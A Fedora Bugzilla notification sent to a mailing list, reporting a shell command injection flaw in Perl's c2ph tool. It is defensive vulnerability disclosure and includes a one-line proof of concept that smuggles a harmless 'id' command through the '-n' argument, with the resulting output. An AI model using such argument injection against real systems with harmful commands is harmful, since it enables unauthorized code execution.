[Bug 1210614] New: Shell command injection in c2ph tool
bugzilla at redhat.com
bugzilla at redhat.com
Fri Apr 10 08:13:36 UTC 2015
https://bugzilla.redhat.com/show_bug.cgi?id=1210614
Bug ID: 1210614
Summary: Shell command injection in c2ph tool
Product: Fedora
Version: 21
Component: perl
Assignee: jplesnik at redhat.com
Reporter: ppisar at redhat.com
QA Contact: extras-qa at fedoraproject.org
CC: cweyl at alumni.drew.edu, iarnell at gmail.com,
jplesnik at redhat.com, kasal at ucw.cz,
perl-devel at lists.fedoraproject.org, ppisar at redhat.com,
psabata at redhat.com, rc040203 at freenet.de,
tcallawa at redhat.com
The c2ph suffers from shell command injection:
$ c2ph -n '; id; x.c'
cc: fatal error: no input files
compilation terminated.
uid=500(petr) gid=500(petr) groups=500(petr),63(audio),100(users),478(mock)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh: x.c: command not found
Tested with perl-5.18.4-308.fc21.x86_64.
Reported to upstream <https://rt.perl.org/Ticket/Display.html?id=124275>.
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the perl-devel
mailing list